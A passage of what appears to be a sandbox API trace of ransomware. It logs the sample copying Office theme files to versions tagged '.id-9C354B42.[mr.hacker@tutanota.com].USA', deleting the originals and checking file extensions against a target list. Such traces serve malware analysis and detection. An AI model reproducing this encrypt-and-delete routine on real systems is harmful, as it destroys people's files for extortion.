lpNumberOfBytesWritten=0x2defc9c, lpOverlapped=0x0 | out: lpBuffer=0x3860020*, lpNumberOfBytesWritten=0x2defc9c*=0xec, lpOverlapped=0x0) returned 1 [0048.507] SetEndOfFile (hFile=0x21c) returned 1 [0048.507] CloseHandle (hObject=0x21c) returned 1 [0048.507] SetFilePointerEx (in: hFile=0x218, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2defec8 | out: lpNewFilePointer=0x0) returned 1 [0048.507] SetEndOfFile (hFile=0x218) returned 1 [0048.508] CloseHandle (hObject=0x218) returned 1 [0048.508] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SATIN\\THMBNAIL.PNG.id-9C354B42.[mr.hacker@tutanota.com].USA", dwFileAttributes=0x20) returned 1 [0048.508] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SATIN\\THMBNAIL.PNG" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\satin\\thmbnail.png")) returned 1 [0048.508] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SATIN\\THMBNAIL.PNG") returned 74 [0048.508] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SATIN\\THMBNAIL.PNG") returned 74 [0048.508] lstrlenW (lpString=".doc") returned 4 [0048.508] lstrcmpiW (lpString1=".doc", lpString2=".PNG") returned -1 [0048.508] lstrlenW (lpString=".docx") returned 5 [0048.508] lstrcmpiW (lpString1=".docx", lpString2="L.PNG") returned -1 [0048.508] lstrlenW (lpString=".pdf") returned 4 [0048.508] lstrcmpiW (lpString1=".pdf", lpString2=".PNG") returned -1 [0048.508] lstrlenW (lpString=".xls") returned 4 [0048.508] lstrcmpiW (lpString1=".xls", lpString2=".PNG") returned 1 [0048.508] lstrlenW (lpString=".xlsx") returned 5 [0048.508] lstrcmpiW (lpString1=".xlsx", lpString2="L.PNG") returned -1 [0048.508] lstrlenW (lpString=".ppt") returned 4 [0048.508] lstrcmpiW (lpString1=".ppt", lpString2=".PNG") returned 1 [0048.509] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SATIN\\THMBNAIL.PNG") returned 74 [0048.509] lstrlenW (lpString=".zip") returned 4 [0048.509] lstrcmpiW (lpString1=".zip", lpString2=".PNG") returned 1 [0048.509] lstrlenW (lpString=".rar") returned 4 [0048.509] lstrcmpiW (lpString1=".rar", lpString2=".PNG") returned 1 [0048.509] lstrlenW (lpString=".bz2") returned 4 [0048.509] lstrcmpiW (lpString1=".bz2", lpString2=".PNG") returned -1 [0048.509] lstrlenW (lpString=".7z") returned 3 [0048.509] lstrcmpiW (lpString1=".7z", lpString2="PNG") returned -1 [0048.509] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SATIN\\THMBNAIL.PNG") returned 74 [0048.509] lstrlenW (lpString=".dbf") returned 4 [0048.509] lstrcmpiW (lpString1=".dbf", lpString2=".PNG") returned -1 [0048.509] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SATIN\\THMBNAIL.PNG") returned 74 [0048.509] lstrlenW (lpString=".1cd") returned 4 [0048.509] lstrcmpiW (lpString1=".1cd", lpString2=".PNG") returned -1 [0048.509] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SATIN\\THMBNAIL.PNG") returned 74 [0048.509] lstrlenW (lpString=".jpg") returned 4 [0048.509] lstrcmpiW (lpString1=".jpg", lpString2=".PNG") returned -1 [0048.509] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SATIN\\THMBNAIL.PNG") returned 74 [0048.509] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SATIN\\THMBNAIL.PNG") returned 74 [0048.509] lstrlenW (lpString=".doc") returned 4 [0048.509] lstrcmpiW (lpString1=".doc", lpString2=".PNG") returned -1 [0048.509] lstrlenW (lpString=".docx") returned 5 [0048.509] lstrcmpiW (lpString1=".docx", lpString2="L.PNG") returned -1 [0048.509] lstrlenW (lpString=".pdf") returned 4 [0048.509] lstrcmpiW (lpString1=".pdf", lpString2=".PNG") returned -1 [0048.509] lstrlenW (lpString=".xls") returned 4 [0048.509] lstrcmpiW (lpString1=".xls", lpString2=".PNG") returned 1 [0048.509] lstrlenW (lpString=".xlsx") returned 5 [0048.509] lstrcmpiW (lpString1=".xlsx", lpString2="L.PNG") returned -1 [0048.509] lstrlenW (lpString=".ppt") returned 4 [0048.509] lstrcmpiW (lpString1=".ppt", lpString2=".PNG") returned 1 [0048.509] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SATIN\\THMBNAIL.PNG") returned 74 [0048.509] lstrlenW (lpString=".zip") returned 4 [0048.510] lstrcmpiW (lpString1=".zip", lpString2=".PNG") returned 1 [0048.510] lstrlenW (lpString=".rar") returned 4 [0048.510] lstrcmpiW (lpString1=".rar", lpString2=".PNG") returned 1 [0048.510] lstrlenW (lpString=".bz2") returned 4 [0048.510] lstrcmpiW (lpString1=".bz2", lpString2=".PNG") returned -1 [0048.510] lstrlenW (lpString=".7z") returned 3 [0048.510] lstrcmpiW (lpString1=".7z", lpString2="PNG") returned -1 [0048.510] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SATIN\\THMBNAIL.PNG") returned 74 [0048.510] lstrlenW (lpString=".dbf") returned 4 [0048.510] lstrcmpiW (lpString1=".dbf", lpString2=".PNG") returned -1 [0048.510] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SATIN\\THMBNAIL.PNG") returned 74 [0048.510] lstrlenW (lpString=".1cd") returned 4 [0048.510] lstrcmpiW (lpString1=".1cd", lpString2=".PNG") returned -1 [0048.510] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SATIN\\THMBNAIL.PNG") returned 74 [0048.510] lstrlenW (lpString=".jpg") returned 4 [0048.510] lstrcmpiW (lpString1=".jpg", lpString2=".PNG") returned -1 [0048.510] lstrcmpiW (lpString1=".GIF", lpString2=".USA") returned -1 [0048.510] lstrlenW (lpString="PREVIEW.GIF") returned 11 [0048.510] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SKY\\PREVIEW.GIF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\sky\\preview.gif"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x218 [0048.510] GetFileSizeEx (in: hFile=0x218, lpFileSize=0x2deff1c | out: lpFileSize=0x2deff1c*=937) returned 1 [0048.510] CloseHandle (hObject=0x218) returned 1 [0048.511] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SKY\\PREVIEW.GIF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\sky\\preview.gif")) returned 0x20 [0048.511] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SKY\\PREVIEW.GIF.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\sky\\preview.gif.id-9c354b42.[mr.hacker@tutanota.com].usa")) returned 0xffffffff [0048.511] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SKY\\PREVIEW.GIF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\sky\\preview.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x218 [0048.511] SetFilePointerEx (in: hFile=0x218, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2defec8 | out: lpNewFilePointer=0x0) returned 1 [0048.511] SetFilePointerEx (in: hFile=0x218, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2defec8 | out: lpNewFilePointer=0x0) returned 1 [0048.511] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SKY\\PREVIEW.GIF.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\sky\\preview.gif.id-9c354b42.[mr.hacker@tutanota.com].usa"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x21c [0048.513] GetLastError () returned 0x0 [0048.513] ReadFile (in: hFile=0x218, lpBuffer=0x3860020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2defed4, lpOverlapped=0x0 | out: lpBuffer=0x3860020*, lpNumberOfBytesRead=0x2defed4*=0x3a9, lpOverlapped=0x0) returned 1 [0048.514] WriteFile (in: hFile=0x21c, lpBuffer=0x3860020*, nNumberOfBytesToWrite=0x3b0, lpNumberOfBytesWritten=0x2defc9c, lpOverlapped=0x0 | out: lpBuffer=0x3860020*, lpNumberOfBytesWritten=0x2defc9c*=0x3b0, lpOverlapped=0x0) returned 1 [0048.515] ReadFile (in: hFile=0x218, lpBuffer=0x3860020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2defed4, lpOverlapped=0x0 | out: lpBuffer=0x3860020*, lpNumberOfBytesRead=0x2defed4*=0x0, lpOverlapped=0x0) returned 1 [0048.515] WriteFile (in: hFile=0x21c, lpBuffer=0x3860020*, nNumberOfBytesToWrite=0xea, lpNumberOfBytesWritten=0x2defc9c, lpOverlapped=0x0 | out: lpBuffer=0x3860020*, lpNumberOfBytesWritten=0x2defc9c*=0xea, lpOverlapped=0x0) returned 1 [0048.515] SetEndOfFile (hFile=0x21c) returned 1 [0048.515] CloseHandle (hObject=0x21c) returned 1 [0048.515] SetFilePointerEx (in: hFile=0x218, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2defec8 | out: lpNewFilePointer=0x0) returned 1 [0048.515] SetEndOfFile (hFile=0x218) returned 1 [0048.516] CloseHandle (hObject=0x218) returned 1 [0048.516] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SKY\\PREVIEW.GIF.id-9C354B42.[mr.hacker@tutanota.com].USA", dwFileAttributes=0x20) returned 1 [0048.516] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SKY\\PREVIEW.GIF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\sky\\preview.gif")) returned 1 [0048.516] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SKY\\PREVIEW.GIF") returned 71 [0048.517] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SKY\\PREVIEW.GIF") returned 71 [0048.517] lstrlenW (lpString=".doc") returned 4 [0048.517] lstrcmpiW (lpString1=".doc", lpString2=".GIF") returned -1 [0048.517] lstrlenW (lpString=".docx") returned 5 [0048.517] lstrcmpiW (lpString1=".docx", lpString2="W.GIF") returned -1 [0048.517] lstrlenW (lpString=".pdf") returned 4 [0048.517] lstrcmpiW (lpString1=".pdf", lpString2=".GIF") returned 1 [0048.517] lstrlenW (lpString=".xls") returned 4 [0048.517] lstrcmpiW (lpString1=".xls", lpString2=".GIF") returned 1 [0048.517] lstrlenW (lpString=".xlsx") returned 5 [0048.517] lstrcmpiW (lpString1=".xlsx", lpString2="W.GIF") returned -1 [0048.517] lstrlenW (lpString=".ppt") returned 4 [0048.517] lstrcmpiW (lpString1=".ppt", lpString2=".GIF") returned 1 [0048.517] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SKY\\PREVIEW.GIF") returned 71 [0048.517] lstrlenW (lpString=".zip") returned 4 [0048.517] lstrcmpiW (lpString1=".zip", lpString2=".GIF") returned 1 [0048.517] lstrlenW (lpString=".rar") returned 4 [0048.517] lstrcmpiW (lpString1=".rar", lpString2=".GIF") returned 1 [0048.517] lstrlenW (lpString=".bz2") returned 4 [0048.517] lstrcmpiW (lpString1=".bz2", lpString2=".GIF") returned -1 [0048.517] lstrlenW (lpString=".7z") returned 3 [0048.517] lstrcmpiW (lpString1=".7z", lpString2="GIF") returned -1 [0048.517] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SKY\\PREVIEW.GIF") returned 71 [0048.517] lstrlenW (lpString=".dbf") returned 4 [0048.517] lstrcmpiW (lpString1=".dbf", lpString2=".GIF") returned -1 [0048.517] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SKY\\PREVIEW.GIF") returned 71 [0048.517] lstrlenW (lpString=".1cd") returned 4 [0048.517] lstrcmpiW (lpString1=".1cd", lpString2=".GIF") returned -1 [0048.517] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SKY\\PREVIEW.GIF") returned 71 [0048.517] lstrlenW (lpString=".jpg") returned 4 [0048.517] lstrcmpiW (lpString1=".jpg", lpString2=".GIF") returned 1 [0048.517] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SKY\\PREVIEW.GIF") returned 71 [0048.517] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SKY\\PREVIEW.GIF") returned 71 [0048.517] lstrlenW (lpString=".doc") returned 4 [0048.517] lstrcmpiW (lpString1=".doc", lpString2=".GIF") returned -1 [0048.518] lstrlenW (lpString=".docx") returned 5 [0048.518] lstrcmpiW (lpString1=".docx", lpString2="W.GIF") returned -1 [0048.518] lstrlenW (lpString=".pdf") returned 4 [0048.518] lstrcmpiW (lpString1=".pdf", lpString2=".GIF") returned 1 [0048.518] lstrlenW (lpString=".xls") returned 4 [0048.518] lstrcmpiW (lpString1=".xls", lpString2=".GIF") returned 1 [0048.518] lstrlenW (lpString=".xlsx") returned 5 [0048.518] lstrcmpiW (lpString1=".xlsx", lpString2="W.GIF") returned -1 [0048.518] lstrlenW (lpString=".ppt") returned 4 [0048.518] lstrcmpiW (lpString1=".ppt", lpString2=".GIF") returned 1 [0048.518] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SKY\\PREVIEW.GIF") returned 71 [0048.518] lstrlenW (lpString=".zip") returned 4 [0048.518] lstrcmpiW (lpString1=".zip", lpString2=".GIF") returned 1 [0048.518] lstrlenW (lpString=".rar") returned 4 [0048.518] lstrcmpiW (lpString1=".rar", lpString2=".GIF") returned 1 [0048.518] lstrlenW (lpString=".bz2") returned 4 [0048.518] lstrcmpiW (lpString1=".bz2", lpString2=".GIF") returned -1 [0048.518] lstrlenW (lpString=".7z") returned 3 [0048.518] lstrcmpiW (lpString1=".7z", lpString2="GIF") returned -1 [0048.518] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SKY\\PREVIEW.GIF") returned 71 [0048.518] lstrlenW (lpString=".dbf") returned 4 [0048.518] lstrcmpiW (lpString1=".dbf", lpString2=".GIF") returned -1 [0048.518] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SKY\\PREVIEW.GIF") returned 71 [0048.518] lstrlenW (lpString=".1cd") returned 4 [0048.518] lstrcmpiW (lpString1=".1cd", lpString2=".GIF") returned -1 [0048.518] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SKY\\PREVIEW.GIF") returned 71 [0048.518] lstrlenW (lpString=".jpg") returned 4 [0048.518] lstrcmpiW (lpString1=".jpg", lpString2=".GIF") returned 1 [0048.518] lstrcmpiW (lpString1=".PNG", lpString2=".USA") returned -1 [0048.518] lstrlenW (lpString="THMBNAIL.PNG") returned 12 [0048.518] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SKY\\THMBNAIL.PNG" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\sky\\thmbnail.png"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x218 [0048.519] GetFileSizeEx (in: hFile=0x218, lpFileSize=0x2deff1c | out: lpFileSize=0x2deff1c*=29305) returned 1 [0048.519] CloseHandle (hObject=0x218) returned 1 [0048.519] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SKY\\THMBNAIL.PNG" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\sky\\thmbnail.png")) returned 0x20 [0048.519] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SKY\\THMBNAIL.PNG.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\sky\\thmbnail.png.id-9c354b42.[mr.hacker@tutanota.com].usa")) returned 0xffffffff [0048.519] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SKY\\THMBNAIL.PNG" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\sky\\thmbnail.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x218 [0048.519] SetFilePointerEx (in: hFile=0x218, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2defec8 | out: lpNewFilePointer=0x0) returned 1 [0048.519] SetFilePointerEx (in: hFile=0x218, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2defec8 | out: lpNewFilePointer=0x0) returned 1 [0048.519] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SKY\\THMBNAIL.PNG.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\sky\\thmbnail.png.id-9c354b42.[mr.hacker@tutanota.com].usa"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x21c [0048.519] GetLastError () returned 0x0 [0048.519] ReadFile (in: hFile=0x218, lpBuffer=0x3860020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2defed4, lpOverlapped=0x0 | out: lpBuffer=0x3860020*, lpNumberOfBytesRead=0x2defed4*=0x7279, lpOverlapped=0x0) returned 1 [0048.871] WriteFile (in: hFile=0x21c, lpBuffer=0x3860020*, nNumberOfBytesToWrite=0x7280, lpNumberOfBytesWritten=0x2defc9c, lpOverlapped=0x0 | out: lpBuffer=0x3860020*, lpNumberOfBytesWritten=0x2defc9c*=0x7280, lpOverlapped=0x0) returned 1 [0048.881] ReadFile (in: hFile=0x218, lpBuffer=0x3860020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2defed4, lpOverlapped=0x0 | out: lpBuffer=0x3860020*, lpNumberOfBytesRead=0x2defed4*=0x0, lpOverlapped=0x0) returned 1 [0048.881] WriteFile (in: hFile=0x21c, lpBuffer=0x3860020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2defc9c, lpOverlapped=0x0 | out: lpBuffer=0x3860020*, lpNumberOfBytesWritten=0x2defc9c*=0xec, lpOverlapped=0x0) returned 1 [0048.881] SetEndOfFile (hFile=0x21c) returned 1 [0048.881] CloseHandle (hObject=0x21c) returned 1 [0048.881] SetFilePointerEx (in: hFile=0x218, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2defec8 | out: lpNewFilePointer=0x0) returned 1 [0048.881] SetEndOfFile (hFile=0x218) returned 1 [0048.882] CloseHandle (hObject=0x218) returned 1 [0048.882] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SKY\\THMBNAIL.PNG.id-9C354B42.[mr.hacker@tutanota.com].USA", dwFileAttributes=0x20) returned 1 [0048.882] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SKY\\THMBNAIL.PNG" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\sky\\thmbnail.png")) returned 1 [0048.883] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SKY\\THMBNAIL.PNG") returned 72 [0048.883] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SKY\\THMBNAIL.PNG") returned 72 [0048.883] lstrlenW (lpString=".doc") returned 4 [0048.883] lstrcmpiW (lpString1=".doc", lpString2=".PNG") returned -1 [0048.883] lstrlenW (lpString=".docx") returned 5 [0048.883] lstrcmpiW (lpString1=".docx", lpString2="L.PNG") returned -1 [0048.883] lstrlenW (lpString=".pdf") returned 4 [0048.883] lstrcmpiW (lpString1=".pdf", lpString2=".PNG") returned -1 [0048.883] lstrlenW (lpString=".xls") returned 4 [0048.883] lstrcmpiW (lpString1=".xls", lpString2=".PNG") returned 1 [0048.883] lstrlenW (lpString=".xlsx") returned 5 [0048.883] lstrcmpiW (lpString1=".xlsx", lpString2="L.PNG") returned -1 [0048.883] lstrlenW (lpString=".ppt") returned 4 [0048.883] lstrcmpiW (lpString1=".ppt", lpString2=".PNG") returned 1 [0048.883] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SKY\\THMBNAIL.PNG") returned 72 [0048.883] lstrlenW (lpString=".zip") returned 4 [0048.883] lstrcmpiW (lpString1=".zip", lpString2=".PNG") returned 1 [0048.883] lstrlenW (lpString=".rar") returned 4 [0048.883] lstrcmpiW (lpString1=".rar", lpString2=".PNG") returned 1 [0048.883] lstrlenW (lpString=".bz2") returned 4 [0048.883] lstrcmpiW (lpString1=".bz2", lpString2=".PNG") returned -1 [0048.883] lstrlenW (lpString=".7z") returned 3 [0048.883] lstrcmpiW (lpString1=".7z", lpString2="PNG") returned -1 [0048.883] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SKY\\THMBNAIL.PNG") returned 72 [0048.883] lstrlenW (lpString=".dbf") returned 4 [0048.883] lstrcmpiW (lpString1=".dbf", lpString2=".PNG") returned -1 [0048.883] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SKY\\THMBNAIL.PNG") returned 72 [0048.883] lstrlenW (lpString=".1cd") returned 4 [0048.883] lstrcmpiW (lpString1=".1cd", lpString2=".PNG") returned -1 [0048.883] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SKY\\THMBNAIL.PNG") returned 72 [0048.883] lstrlenW (lpString=".jpg") returned 4 [0048.883] lstrcmpiW (lpString1=".jpg", lpString2=".PNG") returned -1 [0048.883] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SKY\\THMBNAIL.PNG") returned 72 [0048.883] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SKY\\THMBNAIL.PNG") returned 72 [0048.883] lstrlenW (lpString=".doc") returned 4 [0048.884] lstrcmpiW (lpString1=".doc", lpString2=".PNG") returned -1 [0048.884] lstrlenW (lpString=".docx") returned 5 [0048.884] lstrcmpiW (lpString1=".docx", lpString2="L.PNG") returned -1 [0048.884] lstrlenW (lpString=".pdf") returned 4 [0048.884] lstrcmpiW (lpString1=".pdf", lpString2=".PNG") returned -1 [0048.884] lstrlenW (lpString=".xls") returned 4 [0048.884] lstrcmpiW (lpString1=".xls", lpString2=".PNG") returned 1 [0048.884] lstrlenW (lpString=".xlsx") returned 5 [0048.884] lstrcmpiW (lpString1=".xlsx", lpString2="L.PNG") returned -1 [0048.884] lstrlenW (lpString=".ppt") returned 4 [0048.884] lstrcmpiW (lpString1=".ppt", lpString2=".PNG") returned 1 [0048.884] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SKY\\THMBNAIL.PNG") returned 72 [0048.884] lstrlenW (lpString=".zip") returned 4 [0048.884] lstrcmpiW (lpString1=".zip", lpString2=".PNG") returned 1 [0048.884] lstrlenW (lpString=".rar") returned 4 [0048.884] lstrcmpiW (lpString1=".rar", lpString2=".PNG") returned 1 [0048.884] lstrlenW (lpString=".bz2") returned 4 [0048.884] lstrcmpiW (lpString1=".bz2", lpString2=".PNG") returned -1 [0048.884] lstrlenW (lpString=".7z") returned 3 [0048.884] lstrcmpiW (lpString1=".7z", lpString2="PNG") returned -1 [0048.884] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SKY\\THMBNAIL.PNG") returned 72 [0048.884] lstrlenW (lpString=".dbf") returned 4 [0048.884] lstrcmpiW (lpString1=".dbf", lpString2=".PNG") returned -1 [0048.884] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SKY\\THMBNAIL.PNG") returned 72 [0048.884] lstrlenW (lpString=".1cd") returned 4 [0048.884] lstrcmpiW (lpString1=".1cd", lpString2=".PNG") returned -1 [0048.884] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SKY\\THMBNAIL.PNG") returned 72 [0048.884] lstrlenW (lpString=".jpg") returned 4 [0048.884] lstrcmpiW (lpString1=".jpg", lpString2=".PNG") returned -1 [0048.885] SetFilePointerEx (in: hFile=0x218, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2defec8 | out: lpNewFilePointer=0x0) returned 1 [0048.885] SetFilePointerEx (in: hFile=0x218, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2defec8 | out: lpNewFilePointer=0x0) returned 1 [0048.885] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\STUDIO\\PREVIEW.GIF.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\studio\\preview.gif.id-9c354b42.[mr.hacker@tutanota.com].usa"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1b0 [0049.161] GetLastError () returned 0x0 [0049.161] ReadFile (in: hFile=0x218, lpBuffer=0x3860020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2defed4, lpOverlapped=0x0 | out: lpBuffer=0x3860020*, lpNumberOfBytesRead=0x2defed4*=0x68b, lpOverlapped=0x0) returned 1 [0049.162] WriteFile (in: hFile=0x1b0, lpBuffer=0x3860020*, nNumberOfBytesToWrite=0x690, lpNumberOfBytesWritten=0x2defc9c, lpOverlapped=0x0 | out: lpBuffer=0x3860020*, lpNumberOfBytesWritten=0x2defc9c*=0x690, lpOverlapped=0x0) returned 1 [0049.163] ReadFile (in: hFile=0x218, lpBuffer=0x3860020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2defed4, lpOverlapped=0x0 | out: lpBuffer=0x3860020*, lpNumberOfBytesRead=0x2defed4*=0x0, lpOverlapped=0x0) returned 1 [0049.163] WriteFile (in: hFile=0x1b0, lpBuffer=0x3860020*, nNumberOfBytesToWrite=0xea, lpNumberOfBytesWritten=0x2defc9c, lpOverlapped=0x0 | out: lpBuffer=0x3860020*, lpNumberOfBytesWritten=0x2defc9c*=0xea, lpOverlapped=0x0) returned 1 [0049.163] SetEndOfFile (hFile=0x1b0) returned 1 [0049.163] CloseHandle (hObject=0x1b0) returned 1 [0049.164] SetFilePointerEx (in: hFile=0x218, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2defec8 | out: lpNewFilePointer=0x0) returned 1 [0049.164] SetEndOfFile (hFile=0x218) returned 1 [0049.164] CloseHandle (hObject=0x218) returned 1 [0049.165] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\STUDIO\\PREVIEW.GIF.id-9C354B42.[mr.hacker@tutanota.com].USA", dwFileAttributes=0x20) returned 1 [0049.165] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\STUDIO\\PREVIEW.GIF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\studio\\preview.gif")) returned 1 [0049.165] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\STUDIO\\PREVIEW.GIF") returned 74 [0049.165] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\STUDIO\\PREVIEW.GIF") returned 74 [0049.165] lstrlenW (lpString=".doc") returned 4 [0049.165] lstrcmpiW (lpString1=".doc", lpString2=".GIF") returned -1 [0049.165] lstrlenW (lpString=".docx") returned 5 [0049.165] lstrcmpiW (lpString1=".docx", lpString2="W.GIF") returned -1 [0049.165] lstrlenW (lpString=".pdf") returned 4 [0049.165] lstrcmpiW (lpString1=".pdf", lpString2=".GIF") returned 1 [0049.165] lstrlenW (lpString=".xls") returned 4 [0049.165] lstrcmpiW (lpString1=".xls", lpString2=".GIF") returned 1 [0049.165] lstrlenW (lpString=".xlsx") returned 5 [0049.165] lstrcmpiW (lpString1=".xlsx", lpString2="W.GIF") returned -1 [0049.166] lstrlenW (lpString=".ppt") 